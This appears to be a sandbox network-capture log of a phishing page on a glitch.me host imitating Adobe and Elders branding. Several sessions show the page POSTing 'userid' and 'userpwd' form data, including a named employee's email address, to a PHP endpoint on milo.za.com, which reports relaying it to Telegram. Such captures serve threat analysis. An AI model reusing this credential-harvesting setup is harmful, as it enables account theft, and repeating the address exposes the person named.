                                                                                                                                    2024-11-05 08:02:16 UTC7435INData Raw: 32 44 46 34 65 61 4c 6d 4e 48 52 45 51 44 61 30 50 6e 76 39 75 34 36 39 49 56 32 78 55 47 71 39 63 2f 2b 2f 32 6f 61 50 48 34 2b 46 77 41 6b 47 75 4a 30 58 6a 34 33 44 2b 4a 44 41 4f 42 56 58 4a 47 34 41 41 43 69 6c 44 65 66 57 69 43 53 59 74 69 41 6c 68 67 6d 43 50 46 69 4b 63 36 55 34 79 6f 70 54 70 66 6a 66 54 4b 66 2b 46 67 57 78 47 30 41 4b 4b 6c 77 4f 4f 4a 4d 41 46 51 76 51 5a 35 65 79 4d 32 45 47 71 72 39 45 44 73 4a 65 51 49 68 41 47 70 30 69 48 33 7a 38 69 62 7a 49 45 36 44 32 41 62 36 69 43 43 57 36 6a 50 53 66 39 44 4a 2f 4a 74 6d 2b 72 41 6d 68 35 4d 35 6a 4f 56 7a 6b 5a 6c 53 6f 43 42 66 6c 4d 75 5a 2f 6e 2b 57 34 33 39 62 58 71 35 6b 4b 49 59 56 62 43 70 5a 34 74 42 59 36 5a 78 68 33 57 37 6d 54 41 36 58 59 68 57 49 2b 34 54 70 6b 56 45 51
                                                                                                                                    Data Ascii: 2DF4eaLmNHREQDa0Pnv9u469IV2xUGq9c/+/2oaPH4+FwAkGuJ0Xj43D+JDAOBVXJG4AACilDefWiCSYtiAlhgmCPFiKc6U4yopTpfjfTKf+FgWxG0AKKlwOOJMAFQvQZ5eyM2EGqr9EDsJeQIhAGp0iH3z8ibzIE6D2Ab6iCCW6jPSf9DJ/Jtm+rAmh5M5jOVzkZlSoCBflMuZ/n+W439bXq5kKIYVbCpZ4tBY6Zxh3W7mTA6XYhWI+4TpkVEQ


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.449745184.28.90.27443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: identity
                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                    2024-11-05 08:02:20 UTC466INHTTP/1.1 200 OK
                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                    X-CID: 11
                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                    X-Ms-Region: prod-neu-z1
                                                                                                                                    Cache-Control: public, max-age=31433
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:20 GMT
                                                                                                                                    Connection: close
                                                                                                                                    X-CID: 2


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.449752185.15.59.2404435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:21 UTC700OUTGET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1
                                                                                                                                    Host: upload.wikimedia.org
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:22 UTC1066INHTTP/1.1 200 OK
                                                                                                                                    content-type: image/png
                                                                                                                                    content-disposition: inline;filename*=UTF-8''Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                    last-modified: Thu, 11 Jul 2024 16:41:53 GMT
                                                                                                                                    accept-ranges: bytes
                                                                                                                                    content-length: 12378
                                                                                                                                    date: Tue, 05 Nov 2024 08:02:22 GMT
                                                                                                                                    server: envoy
                                                                                                                                    etag: 1d137f6e42bd3f8a9482eafb0c92d735
                                                                                                                                    age: 0
                                                                                                                                    x-cache: cp3077 hit, cp3077 miss
                                                                                                                                    x-cache-status: hit-local
                                                                                                                                    server-timing: cache;desc="hit-local", host;desc="cp3077"
                                                                                                                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                    x-client-ip: 173.254.250.76
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    connection: close
                                                                                                                                    2024-11-05 08:02:22 UTC12378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 80 00 00 01 80 08 06 00 00 00 a4 c7 b5 bf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0b 10 29 34 2a 36 a0 70 00 00 2f 5e 49 44 41 54 78 da ed dd 77 b8 13 55 fe c7 f1 f7 99 49 2e 9d 7b 69 a2 08 d2 9b 22 0a 0a 22 45 8a 88 a8 88 8a 6b 41 5d 7b d7 45 fc d9 57 d7 ba d8 fb 5a d7 b5 77 94 55 2c 14 01 05 91 2a bd 08 48 b3 d2 db a5 df 9b 64 ce ef 8f b0 8a 48 b9 b9 99 f4 cf eb 79 7c 54 48 32 93 73 4e be 9f 39 93 cc 19 43 96 b3 55 c8 0f 87 39 d8 33 34 70 0c f5 2c d4 b3 86 fd 0d 54 c5 52 0d
                                                                                                                                    Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDtIME)4*6p/^IDATxwUI.{i""EkA]{EWZwU,*HdHy|TH2sN9CU934p,TR


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.449753184.28.90.27443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: identity
                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                    2024-11-05 08:02:22 UTC514INHTTP/1.1 200 OK
                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                    X-CID: 11
                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                    X-Ms-Region: prod-weu-z1
                                                                                                                                    Cache-Control: public, max-age=31272
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:22 GMT
                                                                                                                                    Content-Length: 55
                                                                                                                                    Connection: close
                                                                                                                                    X-CID: 2
                                                                                                                                    2024-11-05 08:02:22 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.449755185.15.59.2404435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:23 UTC444OUTGET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1
                                                                                                                                    Host: upload.wikimedia.org
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:23 UTC1066INHTTP/1.1 200 OK
                                                                                                                                    content-type: image/png
                                                                                                                                    content-disposition: inline;filename*=UTF-8''Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                    last-modified: Thu, 11 Jul 2024 16:41:53 GMT
                                                                                                                                    content-length: 12378
                                                                                                                                    date: Tue, 05 Nov 2024 08:02:22 GMT
                                                                                                                                    server: envoy
                                                                                                                                    etag: 1d137f6e42bd3f8a9482eafb0c92d735
                                                                                                                                    age: 1
                                                                                                                                    x-cache: cp3077 hit, cp3077 miss
                                                                                                                                    x-cache-status: hit-local
                                                                                                                                    server-timing: cache;desc="hit-local", host;desc="cp3077"
                                                                                                                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                    x-client-ip: 173.254.250.76
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    accept-ranges: bytes
                                                                                                                                    connection: close
                                                                                                                                    2024-11-05 08:02:23 UTC12378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 80 00 00 01 80 08 06 00 00 00 a4 c7 b5 bf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0b 10 29 34 2a 36 a0 70 00 00 2f 5e 49 44 41 54 78 da ed dd 77 b8 13 55 fe c7 f1 f7 99 49 2e 9d 7b 69 a2 08 d2 9b 22 0a 0a 22 45 8a 88 a8 88 8a 6b 41 5d 7b d7 45 fc d9 57 d7 ba d8 fb 5a d7 b5 77 94 55 2c 14 01 05 91 2a bd 08 48 b3 d2 db a5 df 9b 64 ce ef 8f b0 8a 48 b9 b9 99 f4 cf eb 79 7c 54 48 32 93 73 4e be 9f 39 93 cc 19 43 96 b3 55 c8 0f 87 39 d8 33 34 70 0c f5 2c d4 b3 86 fd 0d 54 c5 52 0d
                                                                                                                                    Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDtIME)4*6p/^IDATxwUI.{i""EkA]{EWZwU,*HdHy|TH2sN9CU934p,TR


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.44975613.32.27.1294435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:23 UTC610OUTGET /elders.com.au HTTP/1.1
                                                                                                                                    Host: logo.clearbit.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:23 UTC548INHTTP/1.1 200 OK
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:23 GMT
                                                                                                                                    x-envoy-response-flags: -
                                                                                                                                    Server: Clearbit
                                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                    Via: 1.1 a7631312afe99e40229aa0da70662112.cloudfront.net (CloudFront)
                                                                                                                                    X-Amz-Cf-Pop: FRA56-C2
                                                                                                                                    X-Amz-Cf-Id: ZFDDrQyZK1kLhdtW93JrPXYlaBc-GEZyiZ1Gqqva2ez2cb2TDWBLTw==
                                                                                                                                    2024-11-05 08:02:23 UTC7286INData Raw: 31 63 36 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1c 35 49 44 41 54 78 9c ec bc 09 b4 5f 55 95 e7 bf f7 3e e7 dc 7b 7f d3 9b 5f e6 97 09 48 18 2a 0c 9a 20 14 85 a0 a0 14 20 15 fe 29 a9 72 40 ff 40 95 55 45 29 b6 88 82 8a c5 20 8a 82 d0 da 45 95 73 e1 80 94 48 ab 5d 62 d1 8d 82 0c 2a 83 03 43 18 43 20 64 4e de 4b f2 5e de f0 1b ee bd e7 9c bd 7b 9d fb 82 ae 5e dd ab 62 3a a1 7f ac e5 ef bb 58 ef f1 7e e3 bd fb 73 f6 74 86 e8 b1 79 87 40 47 ed 13 b5 fb 02 fe d0 d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5
                                                                                                                                    Data Ascii: 1c6ePNGIHDRL\5IDATx_U>{_H* )r@@UE) EsH]b*CC dNK^{^b:X~sty@GfuYmV@fuYmV@fuYmV@fuYmV@fuYmV@
                                                                                                                                    2024-11-05 08:02:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.44975913.32.27.444435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:24 UTC354OUTGET /elders.com.au HTTP/1.1
                                                                                                                                    Host: logo.clearbit.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:25 UTC555INHTTP/1.1 200 OK
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:23 GMT
                                                                                                                                    x-envoy-response-flags: -
                                                                                                                                    Server: Clearbit
                                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                    Via: 1.1 28b0f9ae51406f70504a784d296a3a48.cloudfront.net (CloudFront)
                                                                                                                                    X-Amz-Cf-Pop: FRA56-C2
                                                                                                                                    X-Amz-Cf-Id: k4No0ag2u1-r1JtitKsVzbIoiHpZQL6A53_BxG7byEeqVmc-orefvQ==
                                                                                                                                    Age: 1
                                                                                                                                    2024-11-05 08:02:25 UTC7286INData Raw: 31 63 36 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1c 35 49 44 41 54 78 9c ec bc 09 b4 5f 55 95 e7 bf f7 3e e7 dc 7b 7f d3 9b 5f e6 97 09 48 18 2a 0c 9a 20 14 85 a0 a0 14 20 15 fe 29 a9 72 40 ff 40 95 55 45 29 b6 88 82 8a c5 20 8a 82 d0 da 45 95 73 e1 80 94 48 ab 5d 62 d1 8d 82 0c 2a 83 03 43 18 43 20 64 4e de 4b f2 5e de f0 1b ee bd e7 9c bd 7b 9d fb 82 ae 5e dd ab 62 3a a1 7f ac e5 ef bb 58 ef f1 7e e3 bd fb 73 f6 74 86 e8 b1 79 87 40 47 ed 13 b5 fb 02 fe d0 d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5
                                                                                                                                    Data Ascii: 1c6ePNGIHDRL\5IDATx_U>{_H* )r@@UE) EsH]b*CC dNK^{^b:X~sty@GfuYmV@fuYmV@fuYmV@fuYmV@fuYmV@
                                                                                                                                    2024-11-05 08:02:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.449767188.114.96.34435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:38 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                    Host: milo.za.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Content-Length: 260
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvnAzAzUyr0vF72WM
                                                                                                                                    Accept: */*
                                                                                                                                    Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:38 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 76 6e 41 7a 41 7a 55 79 72 30 76 46 37 32 57 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 76 6e 41 7a 41 7a 55 79 72 30 76 46 37 32 57 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 76 6e 41 7a 41 7a 55 79 72 30 76 46 37 32 57
                                                                                                                                    Data Ascii: ------WebKitFormBoundaryvnAzAzUyr0vF72WMContent-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryvnAzAzUyr0vF72WMContent-Disposition: form-data; name="userpwd"------WebKitFormBoundaryvnAzAzUyr0vF72W
                                                                                                                                    2024-11-05 08:02:38 UTC871INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:38 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A92h%2FCfUaVBIgCpZur2CmqmUzljnrS7mSEqLSPugyD4wYW9sWqTklVfNpLK0jO7TcQOTc4yiFcTaZw321KeciM8TvzFtI95zF%2BmSOlmQ5VAnXolYIF15gPr0GTpLIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb529daccca912-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1683&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1565&delivery_rate=1651083&cwnd=159&unsent_bytes=0&cid=c9cfb1149158ce7a&ts=710&x=0"
                                                                                                                                    2024-11-05 08:02:38 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                    Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                    2024-11-05 08:02:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.449768188.114.97.34435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:39 UTC353OUTGET //pood/phpp4all.php HTTP/1.1
                                                                                                                                    Host: milo.za.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:40 UTC869INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BFEZzgy2pPp9F3IyMZ00dW4%2B%2FcpsiPz1iEGlWOpEPNEeRtzUEzWzyjPbnkvT3NTqFPD9cFHfDxnerdDLvtQQTXi64UTEIEqTGJj9TOORkpP8djbiQOuqI8E4anUqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb52a5faf068f9-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=992&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=931&delivery_rate=2691449&cwnd=242&unsent_bytes=0&cid=1655db1f53f94222&ts=688&x=0"
                                                                                                                                    2024-11-05 08:02:40 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                    Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                    2024-11-05 08:02:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.449770188.114.96.34435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:01 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                    Host: milo.za.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Content-Length: 260
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUBfEA3bJCCPj3Jz9
                                                                                                                                    Accept: */*
                                                                                                                                    Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
